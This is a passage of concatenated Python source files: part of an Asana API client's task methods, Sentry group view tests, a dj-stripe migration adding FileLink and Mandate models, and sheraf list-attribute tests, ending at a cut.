path = "/user_task_lists/{user_task_list_gid}/tasks".replace("{user_task_list_gid}", user_task_list_gid)
return self.client.get_collection(path, params, **options)
def remove_dependencies_for_task(self, task_gid, params=None, **options):
"""Unlink dependencies from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/removeDependencies".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def remove_dependents_for_task(self, task_gid, params=None, **options):
"""Unlink dependents from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/removeDependents".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def remove_follower_for_task(self, task_gid, params=None, **options):
"""Remove followers from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/removeFollowers".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def remove_project_for_task(self, task_gid, params=None, **options):
"""Remove a project from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/removeProject".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def remove_tag_for_task(self, task_gid, params=None, **options):
"""Remove a tag from a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/removeTag".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def search_tasks_for_workspace(self, workspace_gid, params=None, **options):
"""Search tasks in a workspace
:param str workspace_gid: (required) Globally unique identifier for the workspace or organization.
:param Object params: Parameters for the request
- text {str}: Performs full-text search on both task name and description
- resource_subtype {str}: Filters results by the task's resource_subtype
- assignee_any {str}: Comma-separated list of user identifiers
- assignee_not {str}: Comma-separated list of user identifiers
- assignee_status {str}: One of `inbox`, `today`, `upcoming`, or `later`
- portfolios_any {str}: Comma-separated list of portfolio IDs
- projects_any {str}: Comma-separated list of project IDs
- projects_not {str}: Comma-separated list of project IDs
- projects_all {str}: Comma-separated list of project IDs
- sections_any {str}: Comma-separated list of section or column IDs
- sections_not {str}: Comma-separated list of section or column IDs
- sections_all {str}: Comma-separated list of section or column IDs
- tags_any {str}: Comma-separated list of tag IDs
- tags_not {str}: Comma-separated list of tag IDs
- tags_all {str}: Comma-separated list of tag IDs
- teams_any {str}: Comma-separated list of team IDs
- followers_any {str}: Comma-separated list of user identifiers
- followers_not {str}: Comma-separated list of user identifiers
- created_by_any {str}: Comma-separated list of user identifiers
- created_by_not {str}: Comma-separated list of user identifiers
- assigned_by_any {str}: Comma-separated list of user identifiers
- assigned_by_not {str}: Comma-separated list of user identifiers
- liked_by_any {str}: Comma-separated list of user identifiers
- liked_by_not {str}: Comma-separated list of user identifiers
- commented_on_by_any {str}: Comma-separated list of user identifiers
- commented_on_by_not {str}: Comma-separated list of user identifiers
- due_on_before {date}: ISO 8601 date string
- due_on_after {date}: ISO 8601 date string
- due_on {date}: ISO 8601 date string or `null`
- due_at_before {datetime}: ISO 8601 datetime string
- due_at_after {datetime}: ISO 8601 datetime string
- start_on_before {date}: ISO 8601 date string
- start_on_after {date}: ISO 8601 date string
- start_on {date}: ISO 8601 date string or `null`
- created_on_before {date}: ISO 8601 date string
- created_on_after {date}: ISO 8601 date string
- created_on {date}: ISO 8601 date string or `null`
- created_at_before {datetime}: ISO 8601 datetime string
- created_at_after {datetime}: ISO 8601 datetime string
- completed_on_before {date}: ISO 8601 date string
- completed_on_after {date}: ISO 8601 date string
- completed_on {date}: ISO 8601 date string or `null`
- completed_at_before {datetime}: ISO 8601 datetime string
- completed_at_after {datetime}: ISO 8601 datetime string
- modified_on_before {date}: ISO 8601 date string
- modified_on_after {date}: ISO 8601 date string
- modified_on {date}: ISO 8601 date string or `null`
- modified_at_before {datetime}: ISO 8601 datetime string
- modified_at_after {datetime}: ISO 8601 datetime string
- is_blocking {bool}: Filter to incomplete tasks with dependents
- is_blocked {bool}: Filter to tasks with incomplete dependencies
- has_attachment {bool}: Filter to tasks with attachments
- completed {bool}: Filter to completed tasks
- is_subtask {bool}: Filter to subtasks
- sort_by {str}: One of `due_date`, `created_at`, `completed_at`, `likes`, or `modified_at`, defaults to `modified_at`
- sort_ascending {bool}: Default `false`
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/workspaces/{workspace_gid}/tasks/search".replace("{workspace_gid}", workspace_gid)
return self.client.get_collection(path, params, **options)
def set_parent_for_task(self, task_gid, params=None, **options):
"""Set the parent of a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}/setParent".replace("{task_gid}", task_gid)
return self.client.post(path, params, **options)
def update_task(self, task_gid, params=None, **options):
"""Update a task
:param str task_gid: (required) The task to operate on.
:param Object params: Parameters for the request
:param **options
- opt_fields {list[str]}: Defines fields to return. Some requests return *compact* representations of objects in order to conserve resources and complete the request more efficiently. Other times requests return more information than you may need. This option allows you to list the exact set of fields that the API should be sure to return for the objects. The field names should be provided as paths, described below. The id of included objects will always be returned, regardless of the field options.
- opt_pretty {bool}: Provides “pretty” output. Provides the response in a “pretty” format. In the case of JSON this means doing proper line breaking and indentation to make it readable. This will take extra time and increase the response size so it is advisable only to use this during debugging.
:return: Object
"""
if params is None:
params = {}
path = "/tasks/{task_gid}".replace("{task_gid}", task_gid)
return self.client.put(path, params, **options)
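Each method above builds its endpoint URL by plain string substitution on a `{placeholder}` in the path template. A minimal standalone sketch of that pattern (an illustrative helper, not part of this client):

```python
def build_path(template, **path_params):
    """Fill each {name} placeholder in an endpoint template (illustrative only)."""
    path = template
    for name, value in path_params.items():
        path = path.replace("{" + name + "}", value)
    return path


print(build_path("/tasks/{task_gid}/setParent", task_gid="1234"))  # /tasks/1234/setParent
```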

# Source: tests/sentry/web/frontend/groups/tests.py (SilentCircle/sentry, BSD-3-Clause)
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import json
from django.core.urlresolvers import reverse
from sentry.models import GroupSeen
from sentry.constants import MAX_JSON_RESULTS
from sentry.testutils import TestCase, fixture
class GroupDetailsTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
})
def test_simple(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/groups/details.html')
assert 'group' in resp.context
assert 'project' in resp.context
assert 'team' in resp.context
assert resp.context['group'] == self.group
assert resp.context['project'] == self.project
assert resp.context['team'] == self.team
# ensure we've marked the group as seen
assert GroupSeen.objects.filter(
group=self.group, user=self.user).exists()
class GroupListTest(TestCase):
@fixture
def path(self):
return reverse('sentry-stream', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
})
def test_does_render(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/groups/group_list.html')
assert 'project' in resp.context
assert 'team' in resp.context
assert 'event_list' in resp.context
assert resp.context['project'] == self.project
assert resp.context['team'] == self.team
class GroupEventListTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group-events', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
})
def test_does_render(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/groups/event_list.html')
assert 'group' in resp.context
assert 'project' in resp.context
assert 'team' in resp.context
assert 'event_list' in resp.context
assert resp.context['project'] == self.project
assert resp.context['team'] == self.team
assert resp.context['group'] == self.group
class GroupTagListTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group-tags', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
})
def test_does_render(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/groups/tag_list.html')
assert 'group' in resp.context
assert 'project' in resp.context
assert 'team' in resp.context
assert 'tag_list' in resp.context
assert resp.context['project'] == self.project
assert resp.context['team'] == self.team
assert resp.context['group'] == self.group
class GroupEventDetailsTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group-event', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
'event_id': self.event.id,
})
def test_does_render(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
self.assertTemplateUsed(resp, 'sentry/groups/details.html')
assert 'group' in resp.context
assert 'project' in resp.context
assert 'team' in resp.context
assert 'event' in resp.context
assert resp.context['project'] == self.project
assert resp.context['team'] == self.team
assert resp.context['group'] == self.group
assert resp.context['event'] == self.event
class GroupEventListJsonTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group-events-json', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
})
def test_does_render(self):
self.login()
# HACK: force fixture creation
self.event
resp = self.client.get(self.path)
assert resp.status_code == 200
assert resp['Content-Type'] == 'application/json'
data = json.loads(resp.content)
assert len(data) == 1
assert data[0]['id'] == str(self.event.event_id)
def test_does_not_allow_beyond_limit(self):
self.login()
resp = self.client.get(self.path, {'limit': MAX_JSON_RESULTS + 1})
assert resp.status_code == 400
class GroupEventJsonTest(TestCase):
@fixture
def path(self):
return reverse('sentry-group-event-json', kwargs={
'team_slug': self.team.slug,
'project_id': self.project.slug,
'group_id': self.group.id,
'event_id_or_latest': self.event.id,
})
def test_does_render(self):
self.login()
resp = self.client.get(self.path)
assert resp.status_code == 200
assert resp['Content-Type'] == 'application/json'
data = json.loads(resp.content)
assert data['id'] == self.event.event_id
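The `@fixture` decorator used throughout these tests behaves like a memoizing property: the first access builds the value, later accesses reuse it. A minimal sketch of that idea (an assumption about its behavior, not sentry's actual implementation):

```python
class fixture:
    """Non-data descriptor that caches a method's result on first access."""

    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, owner=None):
        if obj is None:
            return self
        value = self.func(obj)
        obj.__dict__[self.name] = value  # instance dict now shadows the descriptor
        return value


class Demo:
    calls = 0

    @fixture
    def path(self):
        Demo.calls += 1
        return "/groups/1/"


d = Demo()
assert d.path == d.path == "/groups/1/"
assert Demo.calls == 1  # computed once, then read from the instance dict
```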

# Source: djstripe/migrations/0008_2_5.py (ExtraE113/dj-stripe, MIT)
# Generated by Django 3.2.3 on 2021-05-30 23:47
import django.db.models.deletion
from django.conf import settings
from django.db import migrations, models
import djstripe.enums
import djstripe.fields
class Migration(migrations.Migration):
dependencies = [
("djstripe", "0007_2_4"),
]
operations = [
migrations.RemoveField(
model_name="subscription",
name="tax_percent",
),
migrations.RemoveField(
model_name="countryspec",
name="djstripe_owner_account",
),
migrations.AddField(
model_name="card",
name="account",
field=djstripe.fields.StripeForeignKey(
blank=True,
help_text="The external account the charge was made on behalf of. Null here indicates that this value was never set.",
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="cards",
to="djstripe.account",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
migrations.AddField(
model_name="card",
name="default_for_currency",
field=models.BooleanField(
help_text="Whether this external account (Card) is the default account for its currency.",
null=True,
),
),
migrations.AlterField(
model_name="bankaccount",
name="account",
field=djstripe.fields.StripeForeignKey(
blank=True,
help_text="The external account the charge was made on behalf of. Null here indicates that this value was never set.",
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="bank_accounts",
to="djstripe.account",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
migrations.AlterField(
model_name="bankaccount",
name="default_for_currency",
field=models.BooleanField(
help_text="Whether this external account (BankAccount) is the default account for its currency.",
null=True,
),
),
migrations.RenameModel(
old_name="FileUpload",
new_name="File",
),
migrations.CreateModel(
name="FileLink",
fields=[
("djstripe_created", models.DateTimeField(auto_now_add=True)),
("djstripe_updated", models.DateTimeField(auto_now=True)),
(
"djstripe_id",
models.BigAutoField(
primary_key=True, serialize=False, verbose_name="ID"
),
),
("id", djstripe.fields.StripeIdField(max_length=255, unique=True)),
(
"livemode",
models.BooleanField(
blank=True,
default=None,
help_text="Null here indicates that the livemode status is unknown or was previously unrecorded. Otherwise, this field indicates whether this record comes from Stripe test mode or live mode operation.",
null=True,
),
),
(
"created",
djstripe.fields.StripeDateTimeField(
blank=True,
help_text="The datetime this object was created in stripe.",
null=True,
),
),
(
"metadata",
djstripe.fields.JSONField(
blank=True,
help_text="A set of key/value pairs that you can attach to an object. It can be useful for storing additional information about an object in a structured format.",
null=True,
),
),
(
"description",
models.TextField(
blank=True, help_text="A description of this object.", null=True
),
),
(
"expires_at",
djstripe.fields.StripeDateTimeField(
blank=True,
help_text="Time at which the link expires.",
null=True,
),
),
(
"url",
models.URLField(
help_text="The publicly accessible URL to download the file."
),
),
(
"djstripe_owner_account",
djstripe.fields.StripeForeignKey(
blank=True,
help_text="The Stripe Account this object belongs to.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
to="djstripe.account",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
(
"file",
djstripe.fields.StripeForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="djstripe.file",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
],
options={
"get_latest_by": "created",
"abstract": False,
},
),
migrations.CreateModel(
name="Mandate",
fields=[
("djstripe_created", models.DateTimeField(auto_now_add=True)),
("djstripe_updated", models.DateTimeField(auto_now=True)),
(
"djstripe_id",
models.BigAutoField(
primary_key=True, serialize=False, verbose_name="ID"
),
),
("id", djstripe.fields.StripeIdField(max_length=255, unique=True)),
(
"livemode",
models.BooleanField(
blank=True,
default=None,
help_text="Null here indicates that the livemode status is unknown or was previously unrecorded. Otherwise, this field indicates whether this record comes from Stripe test mode or live mode operation.",
null=True,
),
),
(
"created",
djstripe.fields.StripeDateTimeField(
blank=True,
help_text="The datetime this object was created in stripe.",
null=True,
),
),
(
"metadata",
djstripe.fields.JSONField(
blank=True,
help_text="A set of key/value pairs that you can attach to an object. It can be useful for storing additional information about an object in a structured format.",
null=True,
),
),
(
"description",
models.TextField(
blank=True, help_text="A description of this object.", null=True
),
),
(
"customer_acceptance",
djstripe.fields.JSONField(
help_text="Details about the customer's acceptance of the mandate."
),
),
(
"payment_method_details",
djstripe.fields.JSONField(
help_text="Additional mandate information specific to the payment method type."
),
),
(
"status",
djstripe.fields.StripeEnumField(
enum=djstripe.enums.MandateStatus,
help_text="The status of the mandate, which indicates whether it can be used to initiate a payment.",
max_length=8,
),
),
(
"type",
djstripe.fields.StripeEnumField(
enum=djstripe.enums.MandateType,
help_text="The status of the mandate, which indicates whether it can be used to initiate a payment.",
max_length=10,
),
),
(
"multi_use",
djstripe.fields.JSONField(
blank=True,
help_text="If this is a `multi_use` mandate, this hash contains details about the mandate.",
null=True,
),
),
(
"single_use",
djstripe.fields.JSONField(
blank=True,
help_text="If this is a `single_use` mandate, this hash contains details about the mandate.",
null=True,
),
),
(
"djstripe_owner_account",
djstripe.fields.StripeForeignKey(
blank=True,
help_text="The Stripe Account this object belongs to.",
null=True,
on_delete=django.db.models.deletion.CASCADE,
to="djstripe.account",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
(
"payment_method",
djstripe.fields.StripeForeignKey(
on_delete=django.db.models.deletion.CASCADE,
to="djstripe.paymentmethod",
to_field=settings.DJSTRIPE_FOREIGN_KEY_TO_FIELD,
),
),
],
options={
"get_latest_by": "created",
"abstract": False,
},
),
migrations.AlterField(
model_name="charge",
name="source",
field=djstripe.fields.PaymentMethodForeignKey(
blank=True,
help_text="The source used for this charge.",
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="charges",
to="djstripe.djstripepaymentmethod",
),
),
migrations.AlterField(
model_name="customer",
name="default_source",
field=djstripe.fields.PaymentMethodForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
related_name="customers",
to="djstripe.djstripepaymentmethod",
),
),
]
| 39.551724 | 226 | 0.453357 | 913 | 11,470 | 5.558598 | 0.202629 | 0.036256 | 0.035862 | 0.046897 | 0.802956 | 0.788571 | 0.748374 | 0.716059 | 0.716059 | 0.716059 | 0 | 0.004931 | 0.469573 | 11,470 | 289 | 227 | 39.688581 | 0.829224 | 0.003923 | 0 | 0.723404 | 1 | 0.021277 | 0.23015 | 0.014882 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.017731 | 0 | 0.028369 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |

# Source: tests/attributes/test_model_list.py (yaal-coop/sheraf, MIT)
import pytest
import sheraf
import tests
class AModel(tests.UUIDAutoModel):
name = sheraf.SimpleAttribute()
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
@pytest.mark.parametrize(
"model",
[
AModel,
f"{AModel.__module__}.{AModel.__name__}",
f"{AModel.__module__}.{AModel.__name__}".encode(),
],
)
def test_model_dict(sheraf_connection, attribute, list_type, model):
class AnotherModel(tests.UUIDAutoModel):
a_list_for_test = attribute(sheraf.ModelAttribute(AModel))
a = AModel.create()
b = AModel.create()
another = AnotherModel.create()
assert [] == list(another.a_list_for_test)
assert 0 == len(another.a_list_for_test)
assert not another.a_list_for_test
with pytest.raises(IndexError):
another.a_list_for_test[5]
another.a_list_for_test.append(a)
another.a_list_for_test.append(b)
_another = AnotherModel.read(another.id)
assert [a, b] == list(_another.a_list_for_test)
assert 2 == len(_another.a_list_for_test)
assert b == _another.a_list_for_test[1]
assert [b] == list(_another.a_list_for_test[1:])
assert a in _another.a_list_for_test
assert b in _another.a_list_for_test
assert not (AModel.create() in _another.a_list_for_test)
assert another.a_list_for_test
c = AModel.create()
d = AModel.create()
_another.a_list_for_test.extend([c, d])
assert [a, b, c, d] == list(_another.a_list_for_test)
other = AnotherModel.create()
other.a_list_for_test.extend([b, c])
assert [b, c] == list(other.a_list_for_test)
other.a_list_for_test.remove(b)
assert [c] == list(other.a_list_for_test)
another.a_list_for_test = [a, b]
_another = AnotherModel.read(another.id)
assert [a, b] == list(_another.a_list_for_test)
assert b == another.a_list_for_test.pop()
assert [a] == list(another.a_list_for_test)
_another.a_list_for_test.clear()
assert [] == list(_another.a_list_for_test)
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_indices(sheraf_connection, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
model = Model.create()
with pytest.raises(IndexError):
model.models[0]
with pytest.raises(IndexError):
model.models[0] = AModel.create()
with pytest.raises(IndexError):
model.models[-1]
with pytest.raises(IndexError):
model.models[-1] = AModel.create()
submodel = AModel.create()
model.models.append(submodel)
assert model.models[0] == submodel
model.models[0] = AModel.create()
with pytest.raises(IndexError):
model.models[1]
with pytest.raises(IndexError):
model.models[1] = AModel.create()
with pytest.raises(TypeError):
model.models["foo"]
with pytest.raises(TypeError):
model.models["foo"] = AModel.create()
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_create(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "A"}, {"name": "B"}])
assert isinstance(model.mapping["models"], list_type)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[0].mapping, sheraf.types.SmallDict)
assert "A" == model.models[0].name
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.mapping["models"], list_type)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[0].mapping, sheraf.types.SmallDict)
assert "A" == model.models[0].name
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_edition(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "c"}, {"name": "c"}])
last_sub_id = model.models[0].id
with sheraf.connection(commit=True):
model.edit(value={"models": [{"name": "a"}, {"name": "b"}]}, edition=True)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "a" == x.name
assert "b" == y.name
assert model.models[0].id == last_sub_id
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "a" == x.name
assert "b" == y.name
assert model.models[0].id == last_sub_id
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_no_edition(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "c"}, {"name": "c"}])
last_sub_id = model.models[0].id
with sheraf.connection(commit=True):
model.edit(value={"models": [{"name": "a"}, {"name": "b"}]}, edition=False)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "c" == x.name
assert "c" == y.name
assert model.models[0].id == last_sub_id
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "c" == x.name
assert "c" == y.name
assert model.models[0].id == last_sub_id
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_replacement(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "c"}, {"name": "c"}])
last_sub_id = model.models[0].id
with sheraf.connection(commit=True):
model.edit(value={"models": [{"name": "a"}, {"name": "b"}]}, replacement=True)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "a" == x.name
assert "b" == y.name
assert model.models[0].id != last_sub_id
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.models[0], AModel)
assert isinstance(model.models[1], AModel)
x, y = list(model.models)
assert "a" == x.name
assert "b" == y.name
assert model.models[0].id != last_sub_id
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_addition(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "a"}])
with sheraf.connection(commit=True):
model.edit(value={"models": [{"name": "a"}, {"name": "b"}]}, addition=True)
assert isinstance(model.mapping["models"], list_type)
assert isinstance(model.models[1], AModel)
assert isinstance(model.models[1].mapping, sheraf.types.SmallDict)
assert "a" == model.models[0].name
assert "b" == model.models[1].name
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.mapping["models"], list_type)
assert isinstance(model.models[1], AModel)
assert isinstance(model.models[1].mapping, sheraf.types.SmallDict)
assert "a" == model.models[0].name
assert "b" == model.models[1].name
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_no_addition(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "a"}])
with sheraf.connection(commit=True):
model.edit(value={"models": [{"name": "a"}, {"name": "b"}]}, addition=False)
assert isinstance(model.mapping["models"], list_type)
assert "a" == model.models[0].name
assert len(model.models) == 1
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.mapping["models"], list_type)
assert "a" == model.models[0].name
assert len(model.models) == 1
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_deletion(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "a"}])
with sheraf.connection(commit=True):
model.edit(value={"models": []}, deletion=True)
assert isinstance(model.mapping["models"], list_type)
assert 0 == len(model.models)
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.mapping["models"], list_type)
assert 0 == len(model.models)
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_update_no_deletion(sheraf_database, attribute, list_type):
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute(AModel))
with sheraf.connection(commit=True):
model = Model.create(models=[{"name": "a"}])
with sheraf.connection(commit=True):
model.edit(value={"models": []}, deletion=False)
assert isinstance(model.mapping["models"], list_type)
assert 1 == len(model.models)
with sheraf.connection():
model = Model.read(model.id)
assert isinstance(model.mapping["models"], list_type)
assert 1 == len(model.models)
@pytest.mark.parametrize(
"attribute,list_type",
[
(sheraf.SmallListAttribute, sheraf.types.SmallList),
(sheraf.LargeListAttribute, sheraf.types.LargeList),
],
)
def test_generic(sheraf_database, attribute, list_type):
class AModel(sheraf.Model):
table = "amodel"
name = sheraf.SimpleAttribute()
class BModel(sheraf.Model):
table = "bmodel"
name = sheraf.SimpleAttribute()
class Model(tests.UUIDAutoModel):
models = attribute(sheraf.ModelAttribute((AModel, BModel)))
with sheraf.connection(commit=True):
a = AModel.create()
m = Model.create(models=[a])
with sheraf.connection(commit=True):
m = Model.read(m.id)
assert m.models == [a]
b = BModel.create()
m.models = [a, b]
with sheraf.connection(commit=True):
m = Model.read(m.id)
assert m.models == [a, b]
@pytest.mark.parametrize(
